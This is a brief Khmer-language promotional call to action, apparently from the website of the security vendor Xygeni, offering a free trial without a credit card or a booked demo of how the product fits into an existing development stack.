ចាប់ផ្តើមការសាកល្បងឥតគិតថ្លៃរបស់អ្នក៖ គ្មានកាតឥណទាន គ្មានការកកិត។ គ្រាន់តែសាងសង់ស្អាត និងស្ងប់ចិត្ត។ ឬ កក់ការបង្ហាញមួយ។ ដើម្បីមើលពីរបៀបដែល Xygeni រួមបញ្ចូលជាមួយជង់ដែលមានស្រាប់របស់អ្នក។







